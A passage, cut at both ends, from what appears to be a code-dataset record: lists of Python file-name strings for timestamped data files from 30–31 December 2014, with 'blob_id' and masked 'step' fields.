'data1Wed_Dec_31_00_21_18_2014.txt',
'data1Wed_Dec_31_00_21_32_2014.txt',
'data1Wed_Dec_31_00_21_47_2014.txt',
'data2Wed_Dec_31_00_22_02_2014.txt',
'data2Wed_Dec_31_00_22_17_2014.txt',
'data2Wed_Dec_31_00_22_32_2014.txt',
'data2Wed_Dec_31_00_22_47_2014.txt',
'data2Wed_Dec_31_00_23_01_2014.txt',
'data2Wed_Dec_31_00_23_16_2014.txt',
'data2Wed_Dec_31_00_23_31_2014.txt',
'data2Wed_Dec_31_00_23_46_2014.txt',
'data2Wed_Dec_31_00_24_01_2014.txt',
'data2Wed_Dec_31_00_24_16_2014.txt',
'data2Wed_Dec_31_00_24_30_2014.txt',
'data2Wed_Dec_31_00_24_45_2014.txt',
'data2Wed_Dec_31_00_25_00_2014.txt',
'data2Wed_Dec_31_00_25_15_2014.txt',
'data2Wed_Dec_31_00_25_29_2014.txt',
'data2Wed_Dec_31_00_25_44_2014.txt',
'data2Wed_Dec_31_00_25_59_2014.txt',
'data2Wed_Dec_31_00_26_14_2014.txt',
'data2Wed_Dec_31_00_26_29_2014.txt',
'data2Wed_Dec_31_00_26_43_2014.txt',
'data2Wed_Dec_31_00_26_59_2014.txt',
'data2Wed_Dec_31_00_27_13_2014.txt',
'data2Wed_Dec_31_00_27_28_2014.txt',
'data2Wed_Dec_31_00_27_43_2014.txt',
'data2Wed_Dec_31_00_27_58_2014.txt',
'data2Wed_Dec_31_00_28_13_2014.txt',
'data2Wed_Dec_31_00_28_28_2014.txt',
'data2Wed_Dec_31_00_28_43_2014.txt',
'data2Wed_Dec_31_00_28_57_2014.txt',
'data2Wed_Dec_31_00_29_12_2014.txt',
'data2Wed_Dec_31_00_29_27_2014.txt',
'data2Wed_Dec_31_00_29_42_2014.txt',
'data2Wed_Dec_31_00_29_57_2014.txt',
'data2Wed_Dec_31_00_30_12_2014.txt',
'data2Wed_Dec_31_00_30_27_2014.txt',
'data2Wed_Dec_31_00_30_42_2014.txt',
'data2Wed_Dec_31_00_30_57_2014.txt',
'data2Wed_Dec_31_00_31_12_2014.txt',
'data2Wed_Dec_31_00_31_27_2014.txt',
'data2Wed_Dec_31_00_31_41_2014.txt',
'data2Wed_Dec_31_00_31_56_2014.txt',
'data2Wed_Dec_31_00_32_11_2014.txt',
'data2Wed_Dec_31_00_32_26_2014.txt',
'data2Wed_Dec_31_00_32_40_2014.txt',
'data2Wed_Dec_31_00_32_55_2014.txt',
'data2Wed_Dec_31_00_33_10_2014.txt',
'data2Wed_Dec_31_00_33_24_2014.txt',
'data2Wed_Dec_31_00_33_39_2014.txt',
'data2Wed_Dec_31_00_33_54_2014.txt',
'data2Wed_Dec_31_00_34_09_2014.txt',
'data3Wed_Dec_31_00_34_24_2014.txt',
'data3Wed_Dec_31_00_34_39_2014.txt',
'data3Wed_Dec_31_00_34_54_2014.txt',
'data3Wed_Dec_31_00_35_09_2014.txt',
'data3Wed_Dec_31_00_35_24_2014.txt',
'data3Wed_Dec_31_00_35_39_2014.txt',
'data3Wed_Dec_31_00_35_54_2014.txt',
'data3Wed_Dec_31_00_36_08_2014.txt',
'data3Wed_Dec_31_00_36_23_2014.txt',
'data3Wed_Dec_31_00_36_38_2014.txt',
'data3Wed_Dec_31_00_36_53_2014.txt',
'data3Wed_Dec_31_00_37_08_2014.txt',
'data3Wed_Dec_31_00_37_22_2014.txt',
'data3Wed_Dec_31_00_37_38_2014.txt',
'data3Wed_Dec_31_00_37_53_2014.txt',
'data3Wed_Dec_31_00_38_08_2014.txt',
'data3Wed_Dec_31_00_38_22_2014.txt',
'data3Wed_Dec_31_00_38_37_2014.txt',
'data3Wed_Dec_31_00_38_52_2014.txt',
'data3Wed_Dec_31_00_39_07_2014.txt',
'data3Wed_Dec_31_00_39_22_2014.txt',
'data3Wed_Dec_31_00_39_36_2014.txt',
'data3Wed_Dec_31_00_39_51_2014.txt',
'data3Wed_Dec_31_00_40_06_2014.txt',
'data3Wed_Dec_31_00_40_21_2014.txt',
'data3Wed_Dec_31_00_40_36_2014.txt',
'data3Wed_Dec_31_00_40_50_2014.txt',
'data3Wed_Dec_31_00_41_05_2014.txt',
'data3Wed_Dec_31_00_41_20_2014.txt',
'data3Wed_Dec_31_00_41_34_2014.txt',
'data3Wed_Dec_31_00_41_50_2014.txt',
'data3Wed_Dec_31_00_42_04_2014.txt',
'data3Wed_Dec_31_00_42_19_2014.txt',
'data3Wed_Dec_31_00_42_33_2014.txt',
'data3Wed_Dec_31_00_42_48_2014.txt',
'data3Wed_Dec_31_00_43_03_2014.txt',
'data3Wed_Dec_31_00_43_18_2014.txt',
'data3Wed_Dec_31_00_43_33_2014.txt',
'data3Wed_Dec_31_00_43_48_2014.txt',
'data3Wed_Dec_31_00_44_03_2014.txt',
'data3Wed_Dec_31_00_44_18_2014.txt',
'data3Wed_Dec_31_00_44_33_2014.txt',
'data3Wed_Dec_31_00_44_48_2014.txt',
'data3Wed_Dec_31_00_45_03_2014.txt',
'data3Wed_Dec_31_00_45_18_2014.txt',
'data3Wed_Dec_31_00_45_33_2014.txt',
'data3Wed_Dec_31_00_45_48_2014.txt',
'data3Wed_Dec_31_00_46_03_2014.txt',
'data3Wed_Dec_31_00_46_18_2014.txt',
'data3Wed_Dec_31_00_46_32_2014.txt']
|
flexible
|
{
"blob_id": "b63221af86748241fdce34052819569a06d37afe",
"index": 6965,
"step-1": "<mask token>\n",
"step-2": "files = ['data0Tue_Dec_30_20_37_34_2014.txt',\n 'data0Tue_Dec_30_20_37_49_2014.txt',\n 'data0Tue_Dec_30_20_38_04_2014.txt',\n 'data0Tue_Dec_30_20_38_19_2014.txt',\n 'data0Tue_Dec_30_20_38_34_2014.txt',\n 'data0Tue_Dec_30_20_38_49_2014.txt',\n 'data0Tue_Dec_30_20_39_04_2014.txt',\n 'data0Tue_Dec_30_20_39_19_2014.txt',\n 'data0Tue_Dec_30_20_39_34_2014.txt',\n 'data0Tue_Dec_30_20_39_49_2014.txt',\n 'data0Tue_Dec_30_20_40_04_2014.txt',\n 'data0Tue_Dec_30_20_40_19_2014.txt',\n 'data0Tue_Dec_30_20_40_34_2014.txt',\n 'data0Tue_Dec_30_20_40_49_2014.txt',\n 'data0Tue_Dec_30_20_41_04_2014.txt',\n 'data0Tue_Dec_30_20_41_18_2014.txt',\n 'data0Tue_Dec_30_20_41_34_2014.txt',\n 'data0Tue_Dec_30_20_41_49_2014.txt',\n 'data0Tue_Dec_30_20_42_04_2014.txt',\n 'data0Tue_Dec_30_20_42_19_2014.txt',\n 'data0Tue_Dec_30_20_42_34_2014.txt',\n 'data0Tue_Dec_30_20_42_49_2014.txt',\n 'data0Tue_Dec_30_20_43_04_2014.txt',\n 'data0Tue_Dec_30_20_43_19_2014.txt',\n 'data0Tue_Dec_30_20_43_34_2014.txt',\n 'data0Tue_Dec_30_20_43_49_2014.txt',\n 'data0Tue_Dec_30_20_44_04_2014.txt',\n 'data0Tue_Dec_30_20_44_19_2014.txt',\n 'data0Tue_Dec_30_20_44_34_2014.txt',\n 'data0Tue_Dec_30_20_44_49_2014.txt',\n 'data0Tue_Dec_30_20_45_04_2014.txt',\n 'data0Tue_Dec_30_20_45_19_2014.txt',\n 'data0Tue_Dec_30_20_45_34_2014.txt',\n 'data0Tue_Dec_30_20_45_49_2014.txt',\n 'data0Tue_Dec_30_20_46_04_2014.txt',\n 'data0Tue_Dec_30_20_46_19_2014.txt',\n 'data0Tue_Dec_30_20_46_34_2014.txt',\n 'data0Tue_Dec_30_20_46_49_2014.txt',\n 'data0Tue_Dec_30_20_47_04_2014.txt',\n 'data0Tue_Dec_30_20_47_19_2014.txt',\n 'data0Tue_Dec_30_20_47_34_2014.txt',\n 'data0Tue_Dec_30_20_47_50_2014.txt',\n 'data0Tue_Dec_30_20_48_05_2014.txt',\n 'data0Tue_Dec_30_20_48_20_2014.txt',\n 'data0Tue_Dec_30_20_48_35_2014.txt',\n 'data0Tue_Dec_30_20_48_50_2014.txt',\n 'data0Tue_Dec_30_20_49_05_2014.txt',\n 'data0Tue_Dec_30_20_49_20_2014.txt',\n 'data0Tue_Dec_30_20_49_35_2014.txt',\n 'data0Tue_Dec_30_20_49_50_2014.txt',\n 
'data1Tue_Dec_30_20_50_05_2014.txt',\n 'data1Tue_Dec_30_20_50_20_2014.txt',\n 'data1Tue_Dec_30_20_50_35_2014.txt',\n 'data1Tue_Dec_30_20_50_50_2014.txt',\n 'data1Tue_Dec_30_20_51_05_2014.txt',\n 'data1Tue_Dec_30_20_51_20_2014.txt',\n 'data1Tue_Dec_30_20_51_35_2014.txt',\n 'data1Tue_Dec_30_20_51_50_2014.txt',\n 'data1Tue_Dec_30_20_52_05_2014.txt',\n 'data1Tue_Dec_30_20_52_20_2014.txt',\n 'data1Tue_Dec_30_20_52_35_2014.txt',\n 'data1Tue_Dec_30_20_52_50_2014.txt',\n 'data1Tue_Dec_30_20_53_05_2014.txt',\n 'data1Tue_Dec_30_20_53_20_2014.txt',\n 'data1Tue_Dec_30_20_53_35_2014.txt',\n 'data1Tue_Dec_30_20_53_50_2014.txt',\n 'data1Tue_Dec_30_20_54_04_2014.txt',\n 'data1Tue_Dec_30_20_54_19_2014.txt',\n 'data1Tue_Dec_30_20_54_34_2014.txt',\n 'data1Tue_Dec_30_20_54_49_2014.txt',\n 'data1Tue_Dec_30_20_55_04_2014.txt',\n 'data1Tue_Dec_30_20_55_19_2014.txt',\n 'data1Tue_Dec_30_20_55_34_2014.txt',\n 'data1Tue_Dec_30_20_55_49_2014.txt',\n 'data1Tue_Dec_30_20_56_04_2014.txt',\n 'data1Tue_Dec_30_20_56_19_2014.txt',\n 'data1Tue_Dec_30_20_56_34_2014.txt',\n 'data1Tue_Dec_30_20_56_49_2014.txt',\n 'data1Tue_Dec_30_20_57_04_2014.txt',\n 'data1Tue_Dec_30_20_57_19_2014.txt',\n 'data1Tue_Dec_30_20_57_33_2014.txt',\n 'data1Tue_Dec_30_20_57_48_2014.txt',\n 'data1Tue_Dec_30_20_58_03_2014.txt',\n 'data1Tue_Dec_30_20_58_18_2014.txt',\n 'data1Tue_Dec_30_20_58_33_2014.txt',\n 'data1Tue_Dec_30_20_58_48_2014.txt',\n 'data1Tue_Dec_30_20_59_03_2014.txt',\n 'data1Tue_Dec_30_20_59_18_2014.txt',\n 'data1Tue_Dec_30_20_59_33_2014.txt',\n 'data1Tue_Dec_30_20_59_48_2014.txt',\n 'data1Tue_Dec_30_21_00_03_2014.txt',\n 'data1Tue_Dec_30_21_00_17_2014.txt',\n 'data1Tue_Dec_30_21_00_32_2014.txt',\n 'data1Tue_Dec_30_21_00_47_2014.txt',\n 'data1Tue_Dec_30_21_01_02_2014.txt',\n 'data1Tue_Dec_30_21_01_17_2014.txt',\n 'data1Tue_Dec_30_21_01_32_2014.txt',\n 'data1Tue_Dec_30_21_01_47_2014.txt',\n 'data1Tue_Dec_30_21_02_03_2014.txt',\n 'data1Tue_Dec_30_21_02_17_2014.txt',\n 'data2Tue_Dec_30_21_02_32_2014.txt',\n 
'data2Tue_Dec_30_21_02_47_2014.txt',\n 'data2Tue_Dec_30_21_03_02_2014.txt',\n 'data2Tue_Dec_30_21_03_17_2014.txt',\n 'data2Tue_Dec_30_21_03_32_2014.txt',\n 'data2Tue_Dec_30_21_03_47_2014.txt',\n 'data2Tue_Dec_30_21_04_02_2014.txt',\n 'data2Tue_Dec_30_21_04_17_2014.txt',\n 'data2Tue_Dec_30_21_04_31_2014.txt',\n 'data2Tue_Dec_30_21_04_46_2014.txt',\n 'data2Tue_Dec_30_21_05_01_2014.txt',\n 'data2Tue_Dec_30_21_05_16_2014.txt',\n 'data2Tue_Dec_30_21_05_31_2014.txt',\n 'data2Tue_Dec_30_21_05_45_2014.txt',\n 'data2Tue_Dec_30_21_06_00_2014.txt',\n 'data2Tue_Dec_30_21_06_16_2014.txt',\n 'data2Tue_Dec_30_21_06_31_2014.txt',\n 'data2Tue_Dec_30_21_06_46_2014.txt',\n 'data2Tue_Dec_30_21_07_01_2014.txt',\n 'data2Tue_Dec_30_21_07_16_2014.txt',\n 'data2Tue_Dec_30_21_07_31_2014.txt',\n 'data2Tue_Dec_30_21_07_46_2014.txt',\n 'data2Tue_Dec_30_21_08_01_2014.txt',\n 'data2Tue_Dec_30_21_08_16_2014.txt',\n 'data2Tue_Dec_30_21_08_30_2014.txt',\n 'data2Tue_Dec_30_21_08_45_2014.txt',\n 'data2Tue_Dec_30_21_09_01_2014.txt',\n 'data2Tue_Dec_30_21_09_16_2014.txt',\n 'data2Tue_Dec_30_21_09_31_2014.txt',\n 'data2Tue_Dec_30_21_09_46_2014.txt',\n 'data2Tue_Dec_30_21_10_00_2014.txt',\n 'data2Tue_Dec_30_21_10_16_2014.txt',\n 'data2Tue_Dec_30_21_10_31_2014.txt',\n 'data2Tue_Dec_30_21_10_45_2014.txt',\n 'data2Tue_Dec_30_21_11_00_2014.txt',\n 'data2Tue_Dec_30_21_11_16_2014.txt',\n 'data2Tue_Dec_30_21_11_31_2014.txt',\n 'data2Tue_Dec_30_21_11_45_2014.txt',\n 'data2Tue_Dec_30_21_12_01_2014.txt',\n 'data2Tue_Dec_30_21_12_16_2014.txt',\n 'data2Tue_Dec_30_21_12_31_2014.txt',\n 'data2Tue_Dec_30_21_12_46_2014.txt',\n 'data2Tue_Dec_30_21_13_00_2014.txt',\n 'data2Tue_Dec_30_21_13_15_2014.txt',\n 'data2Tue_Dec_30_21_13_31_2014.txt',\n 'data2Tue_Dec_30_21_13_46_2014.txt',\n 'data2Tue_Dec_30_21_14_00_2014.txt',\n 'data2Tue_Dec_30_21_14_15_2014.txt',\n 'data2Tue_Dec_30_21_14_30_2014.txt',\n 'data2Tue_Dec_30_21_14_45_2014.txt',\n 'data3Tue_Dec_30_21_15_00_2014.txt',\n 'data3Tue_Dec_30_21_15_15_2014.txt',\n 
'data3Tue_Dec_30_21_15_29_2014.txt',\n 'data3Tue_Dec_30_21_15_44_2014.txt',\n 'data3Tue_Dec_30_21_15_59_2014.txt',\n 'data3Tue_Dec_30_21_16_15_2014.txt',\n 'data3Tue_Dec_30_21_16_30_2014.txt',\n 'data3Tue_Dec_30_21_16_44_2014.txt',\n 'data3Tue_Dec_30_21_16_59_2014.txt',\n 'data3Tue_Dec_30_21_17_15_2014.txt',\n 'data3Tue_Dec_30_21_17_29_2014.txt',\n 'data3Tue_Dec_30_21_17_45_2014.txt',\n 'data3Tue_Dec_30_21_18_00_2014.txt',\n 'data3Tue_Dec_30_21_18_15_2014.txt',\n 'data3Tue_Dec_30_21_18_29_2014.txt',\n 'data3Tue_Dec_30_21_18_44_2014.txt',\n 'data3Tue_Dec_30_21_18_59_2014.txt',\n 'data3Tue_Dec_30_21_19_14_2014.txt',\n 'data3Tue_Dec_30_21_19_29_2014.txt',\n 'data3Tue_Dec_30_21_19_44_2014.txt',\n 'data3Tue_Dec_30_21_19_59_2014.txt',\n 'data3Tue_Dec_30_21_20_14_2014.txt',\n 'data3Tue_Dec_30_21_20_29_2014.txt',\n 'data3Tue_Dec_30_21_20_45_2014.txt',\n 'data3Tue_Dec_30_21_21_00_2014.txt',\n 'data3Tue_Dec_30_21_21_15_2014.txt',\n 'data3Tue_Dec_30_21_21_30_2014.txt',\n 'data3Tue_Dec_30_21_21_45_2014.txt',\n 'data3Tue_Dec_30_21_21_59_2014.txt',\n 'data3Tue_Dec_30_21_22_14_2014.txt',\n 'data3Tue_Dec_30_21_22_29_2014.txt',\n 'data3Tue_Dec_30_21_22_44_2014.txt',\n 'data3Tue_Dec_30_21_22_58_2014.txt',\n 'data3Tue_Dec_30_21_23_14_2014.txt',\n 'data3Tue_Dec_30_21_23_28_2014.txt',\n 'data3Tue_Dec_30_21_23_43_2014.txt',\n 'data3Tue_Dec_30_21_23_58_2014.txt',\n 'data3Tue_Dec_30_21_24_13_2014.txt',\n 'data3Tue_Dec_30_21_24_28_2014.txt',\n 'data3Tue_Dec_30_21_24_43_2014.txt',\n 'data3Tue_Dec_30_21_24_58_2014.txt',\n 'data3Tue_Dec_30_21_25_12_2014.txt',\n 'data3Tue_Dec_30_21_25_28_2014.txt',\n 'data3Tue_Dec_30_21_25_43_2014.txt',\n 'data3Tue_Dec_30_21_25_58_2014.txt',\n 'data3Tue_Dec_30_21_26_12_2014.txt',\n 'data3Tue_Dec_30_21_26_27_2014.txt',\n 'data3Tue_Dec_30_21_26_42_2014.txt',\n 'data3Tue_Dec_30_21_26_57_2014.txt',\n 'data3Tue_Dec_30_21_27_12_2014.txt',\n 'data0Tue_Dec_30_21_27_52_2014.txt',\n 'data0Tue_Dec_30_21_28_07_2014.txt',\n 'data0Tue_Dec_30_21_28_22_2014.txt',\n 
'data0Tue_Dec_30_21_28_37_2014.txt',\n 'data0Tue_Dec_30_21_28_51_2014.txt',\n 'data0Tue_Dec_30_21_29_06_2014.txt',\n 'data0Tue_Dec_30_21_29_21_2014.txt',\n 'data0Tue_Dec_30_21_29_36_2014.txt',\n 'data0Tue_Dec_30_21_29_51_2014.txt',\n 'data0Tue_Dec_30_21_30_06_2014.txt',\n 'data0Tue_Dec_30_21_30_21_2014.txt',\n 'data0Tue_Dec_30_21_30_36_2014.txt',\n 'data0Tue_Dec_30_21_30_50_2014.txt',\n 'data0Tue_Dec_30_21_31_06_2014.txt',\n 'data0Tue_Dec_30_21_31_21_2014.txt',\n 'data0Tue_Dec_30_21_31_36_2014.txt',\n 'data0Tue_Dec_30_21_31_51_2014.txt',\n 'data0Tue_Dec_30_21_32_06_2014.txt',\n 'data0Tue_Dec_30_21_32_21_2014.txt',\n 'data0Tue_Dec_30_21_32_36_2014.txt',\n 'data0Tue_Dec_30_21_32_51_2014.txt',\n 'data0Tue_Dec_30_21_33_05_2014.txt',\n 'data0Tue_Dec_30_21_33_20_2014.txt',\n 'data0Tue_Dec_30_21_33_35_2014.txt',\n 'data0Tue_Dec_30_21_33_50_2014.txt',\n 'data0Tue_Dec_30_21_34_05_2014.txt',\n 'data0Tue_Dec_30_21_34_20_2014.txt',\n 'data0Tue_Dec_30_21_34_34_2014.txt',\n 'data0Tue_Dec_30_21_34_49_2014.txt',\n 'data0Tue_Dec_30_21_35_04_2014.txt',\n 'data0Tue_Dec_30_21_35_20_2014.txt',\n 'data0Tue_Dec_30_21_35_35_2014.txt',\n 'data0Tue_Dec_30_21_35_49_2014.txt',\n 'data0Tue_Dec_30_21_36_04_2014.txt',\n 'data0Tue_Dec_30_21_36_19_2014.txt',\n 'data0Tue_Dec_30_21_36_34_2014.txt',\n 'data0Tue_Dec_30_21_36_49_2014.txt',\n 'data0Tue_Dec_30_21_37_04_2014.txt',\n 'data0Tue_Dec_30_21_37_19_2014.txt',\n 'data0Tue_Dec_30_21_37_34_2014.txt',\n 'data0Tue_Dec_30_21_37_49_2014.txt',\n 'data0Tue_Dec_30_21_38_04_2014.txt',\n 'data0Tue_Dec_30_21_38_18_2014.txt',\n 'data0Tue_Dec_30_21_38_33_2014.txt',\n 'data0Tue_Dec_30_21_38_48_2014.txt',\n 'data0Tue_Dec_30_21_39_03_2014.txt',\n 'data0Tue_Dec_30_21_39_18_2014.txt',\n 'data0Tue_Dec_30_21_39_33_2014.txt',\n 'data0Tue_Dec_30_21_39_48_2014.txt',\n 'data0Tue_Dec_30_21_40_02_2014.txt',\n 'data1Tue_Dec_30_21_40_18_2014.txt',\n 'data1Tue_Dec_30_21_40_33_2014.txt',\n 'data1Tue_Dec_30_21_40_48_2014.txt',\n 'data1Tue_Dec_30_21_41_02_2014.txt',\n 
'data1Tue_Dec_30_21_41_17_2014.txt',\n 'data1Tue_Dec_30_21_41_31_2014.txt',\n 'data1Tue_Dec_30_21_41_46_2014.txt',\n 'data1Tue_Dec_30_21_42_01_2014.txt',\n 'data1Tue_Dec_30_21_42_16_2014.txt',\n 'data1Tue_Dec_30_21_42_31_2014.txt',\n 'data1Tue_Dec_30_21_42_46_2014.txt',\n 'data1Tue_Dec_30_21_43_01_2014.txt',\n 'data1Tue_Dec_30_21_43_16_2014.txt',\n 'data1Tue_Dec_30_21_43_31_2014.txt',\n 'data1Tue_Dec_30_21_43_46_2014.txt',\n 'data1Tue_Dec_30_21_44_01_2014.txt',\n 'data1Tue_Dec_30_21_44_15_2014.txt',\n 'data1Tue_Dec_30_21_44_30_2014.txt',\n 'data1Tue_Dec_30_21_44_46_2014.txt',\n 'data1Tue_Dec_30_21_45_01_2014.txt',\n 'data1Tue_Dec_30_21_45_15_2014.txt',\n 'data1Tue_Dec_30_21_45_30_2014.txt',\n 'data1Tue_Dec_30_21_45_45_2014.txt',\n 'data1Tue_Dec_30_21_46_00_2014.txt',\n 'data1Tue_Dec_30_21_46_15_2014.txt',\n 'data1Tue_Dec_30_21_46_29_2014.txt',\n 'data1Tue_Dec_30_21_46_44_2014.txt',\n 'data1Tue_Dec_30_21_46_59_2014.txt',\n 'data1Tue_Dec_30_21_47_14_2014.txt',\n 'data1Tue_Dec_30_21_47_29_2014.txt',\n 'data1Tue_Dec_30_21_47_44_2014.txt',\n 'data1Tue_Dec_30_21_47_59_2014.txt',\n 'data1Tue_Dec_30_21_48_13_2014.txt',\n 'data1Tue_Dec_30_21_48_28_2014.txt',\n 'data1Tue_Dec_30_21_48_43_2014.txt',\n 'data1Tue_Dec_30_21_48_58_2014.txt',\n 'data1Tue_Dec_30_21_49_13_2014.txt',\n 'data1Tue_Dec_30_21_49_28_2014.txt',\n 'data1Tue_Dec_30_21_49_43_2014.txt',\n 'data1Tue_Dec_30_21_49_57_2014.txt',\n 'data1Tue_Dec_30_21_50_13_2014.txt',\n 'data1Tue_Dec_30_21_50_27_2014.txt',\n 'data1Tue_Dec_30_21_50_42_2014.txt',\n 'data1Tue_Dec_30_21_50_57_2014.txt',\n 'data1Tue_Dec_30_21_51_12_2014.txt',\n 'data1Tue_Dec_30_21_51_27_2014.txt',\n 'data1Tue_Dec_30_21_51_42_2014.txt',\n 'data1Tue_Dec_30_21_51_56_2014.txt',\n 'data1Tue_Dec_30_21_52_11_2014.txt',\n 'data1Tue_Dec_30_21_52_26_2014.txt',\n 'data2Tue_Dec_30_21_52_40_2014.txt',\n 'data2Tue_Dec_30_21_52_55_2014.txt',\n 'data2Tue_Dec_30_21_53_10_2014.txt',\n 'data2Tue_Dec_30_21_53_25_2014.txt',\n 'data2Tue_Dec_30_21_53_40_2014.txt',\n 
'data2Tue_Dec_30_21_53_54_2014.txt',\n 'data2Tue_Dec_30_21_54_09_2014.txt',\n 'data2Tue_Dec_30_21_54_24_2014.txt',\n 'data2Tue_Dec_30_21_54_39_2014.txt',\n 'data2Tue_Dec_30_21_54_53_2014.txt',\n 'data2Tue_Dec_30_21_55_08_2014.txt',\n 'data2Tue_Dec_30_21_55_23_2014.txt',\n 'data2Tue_Dec_30_21_55_38_2014.txt',\n 'data2Tue_Dec_30_21_55_53_2014.txt',\n 'data2Tue_Dec_30_21_56_08_2014.txt',\n 'data2Tue_Dec_30_21_56_23_2014.txt',\n 'data2Tue_Dec_30_21_56_37_2014.txt',\n 'data2Tue_Dec_30_21_56_52_2014.txt',\n 'data2Tue_Dec_30_21_57_07_2014.txt',\n 'data2Tue_Dec_30_21_57_22_2014.txt',\n 'data2Tue_Dec_30_21_57_37_2014.txt',\n 'data2Tue_Dec_30_21_57_51_2014.txt',\n 'data2Tue_Dec_30_21_58_06_2014.txt',\n 'data2Tue_Dec_30_21_58_21_2014.txt',\n 'data2Tue_Dec_30_21_58_35_2014.txt',\n 'data2Tue_Dec_30_21_58_50_2014.txt',\n 'data2Tue_Dec_30_21_59_05_2014.txt',\n 'data2Tue_Dec_30_21_59_20_2014.txt',\n 'data2Tue_Dec_30_21_59_34_2014.txt',\n 'data2Tue_Dec_30_21_59_50_2014.txt',\n 'data2Tue_Dec_30_22_00_05_2014.txt',\n 'data2Tue_Dec_30_22_00_19_2014.txt',\n 'data2Tue_Dec_30_22_00_34_2014.txt',\n 'data2Tue_Dec_30_22_00_49_2014.txt',\n 'data2Tue_Dec_30_22_01_03_2014.txt',\n 'data2Tue_Dec_30_22_01_18_2014.txt',\n 'data2Tue_Dec_30_22_01_33_2014.txt',\n 'data2Tue_Dec_30_22_01_48_2014.txt',\n 'data2Tue_Dec_30_22_02_03_2014.txt',\n 'data2Tue_Dec_30_22_02_18_2014.txt',\n 'data2Tue_Dec_30_22_02_32_2014.txt',\n 'data2Tue_Dec_30_22_02_47_2014.txt',\n 'data2Tue_Dec_30_22_03_02_2014.txt',\n 'data2Tue_Dec_30_22_03_17_2014.txt',\n 'data2Tue_Dec_30_22_03_31_2014.txt',\n 'data2Tue_Dec_30_22_03_46_2014.txt',\n 'data2Tue_Dec_30_22_04_01_2014.txt',\n 'data2Tue_Dec_30_22_04_15_2014.txt',\n 'data2Tue_Dec_30_22_04_30_2014.txt',\n 'data2Tue_Dec_30_22_04_45_2014.txt',\n 'data3Tue_Dec_30_22_05_00_2014.txt',\n 'data3Tue_Dec_30_22_05_15_2014.txt',\n 'data3Tue_Dec_30_22_05_30_2014.txt',\n 'data3Tue_Dec_30_22_05_44_2014.txt',\n 'data3Tue_Dec_30_22_06_00_2014.txt',\n 'data3Tue_Dec_30_22_06_14_2014.txt',\n 
'data3Tue_Dec_30_22_06_29_2014.txt',\n 'data3Tue_Dec_30_22_06_44_2014.txt',\n 'data3Tue_Dec_30_22_06_59_2014.txt',\n 'data3Tue_Dec_30_22_07_14_2014.txt',\n 'data3Tue_Dec_30_22_07_29_2014.txt',\n 'data3Tue_Dec_30_22_07_43_2014.txt',\n 'data3Tue_Dec_30_22_07_58_2014.txt',\n 'data3Tue_Dec_30_22_08_13_2014.txt',\n 'data3Tue_Dec_30_22_08_28_2014.txt',\n 'data3Tue_Dec_30_22_08_43_2014.txt',\n 'data3Tue_Dec_30_22_08_57_2014.txt',\n 'data3Tue_Dec_30_22_09_12_2014.txt',\n 'data3Tue_Dec_30_22_09_27_2014.txt',\n 'data3Tue_Dec_30_22_09_42_2014.txt',\n 'data3Tue_Dec_30_22_09_57_2014.txt',\n 'data3Tue_Dec_30_22_10_12_2014.txt',\n 'data3Tue_Dec_30_22_10_26_2014.txt',\n 'data3Tue_Dec_30_22_10_41_2014.txt',\n 'data3Tue_Dec_30_22_10_56_2014.txt',\n 'data3Tue_Dec_30_22_11_11_2014.txt',\n 'data3Tue_Dec_30_22_11_25_2014.txt',\n 'data3Tue_Dec_30_22_11_41_2014.txt',\n 'data3Tue_Dec_30_22_11_56_2014.txt',\n 'data3Tue_Dec_30_22_12_11_2014.txt',\n 'data3Tue_Dec_30_22_12_26_2014.txt',\n 'data3Tue_Dec_30_22_12_40_2014.txt',\n 'data3Tue_Dec_30_22_12_55_2014.txt',\n 'data3Tue_Dec_30_22_13_10_2014.txt',\n 'data3Tue_Dec_30_22_13_25_2014.txt',\n 'data3Tue_Dec_30_22_13_40_2014.txt',\n 'data3Tue_Dec_30_22_13_55_2014.txt',\n 'data3Tue_Dec_30_22_14_09_2014.txt',\n 'data3Tue_Dec_30_22_14_24_2014.txt',\n 'data3Tue_Dec_30_22_14_39_2014.txt',\n 'data3Tue_Dec_30_22_14_53_2014.txt',\n 'data3Tue_Dec_30_22_15_08_2014.txt',\n 'data3Tue_Dec_30_22_15_23_2014.txt',\n 'data3Tue_Dec_30_22_15_37_2014.txt',\n 'data3Tue_Dec_30_22_15_52_2014.txt',\n 'data3Tue_Dec_30_22_16_07_2014.txt',\n 'data3Tue_Dec_30_22_16_22_2014.txt',\n 'data3Tue_Dec_30_22_16_36_2014.txt',\n 'data3Tue_Dec_30_22_16_51_2014.txt',\n 'data3Tue_Dec_30_22_17_06_2014.txt',\n 'data0Tue_Dec_30_22_17_47_2014.txt',\n 'data0Tue_Dec_30_22_18_01_2014.txt',\n 'data0Tue_Dec_30_22_18_16_2014.txt',\n 'data0Tue_Dec_30_22_18_31_2014.txt',\n 'data0Tue_Dec_30_22_18_46_2014.txt',\n 'data0Tue_Dec_30_22_19_01_2014.txt',\n 'data0Tue_Dec_30_22_19_15_2014.txt',\n 
'data0Tue_Dec_30_22_19_30_2014.txt',\n 'data0Tue_Dec_30_22_19_45_2014.txt',\n 'data0Tue_Dec_30_22_20_00_2014.txt',\n 'data0Tue_Dec_30_22_20_15_2014.txt',\n 'data0Tue_Dec_30_22_20_30_2014.txt',\n 'data0Tue_Dec_30_22_20_44_2014.txt',\n 'data0Tue_Dec_30_22_20_59_2014.txt',\n 'data0Tue_Dec_30_22_21_14_2014.txt',\n 'data0Tue_Dec_30_22_21_29_2014.txt',\n 'data0Tue_Dec_30_22_21_44_2014.txt',\n 'data0Tue_Dec_30_22_21_58_2014.txt',\n 'data0Tue_Dec_30_22_22_13_2014.txt',\n 'data0Tue_Dec_30_22_22_28_2014.txt',\n 'data0Tue_Dec_30_22_22_43_2014.txt',\n 'data0Tue_Dec_30_22_22_58_2014.txt',\n 'data0Tue_Dec_30_22_23_12_2014.txt',\n 'data0Tue_Dec_30_22_23_27_2014.txt',\n 'data0Tue_Dec_30_22_23_42_2014.txt',\n 'data0Tue_Dec_30_22_23_57_2014.txt',\n 'data0Tue_Dec_30_22_24_12_2014.txt',\n 'data0Tue_Dec_30_22_24_26_2014.txt',\n 'data0Tue_Dec_30_22_24_41_2014.txt',\n 'data0Tue_Dec_30_22_24_56_2014.txt',\n 'data0Tue_Dec_30_22_25_11_2014.txt',\n 'data0Tue_Dec_30_22_25_25_2014.txt',\n 'data0Tue_Dec_30_22_25_41_2014.txt',\n 'data0Tue_Dec_30_22_25_55_2014.txt',\n 'data0Tue_Dec_30_22_26_10_2014.txt',\n 'data0Tue_Dec_30_22_26_25_2014.txt',\n 'data0Tue_Dec_30_22_26_39_2014.txt',\n 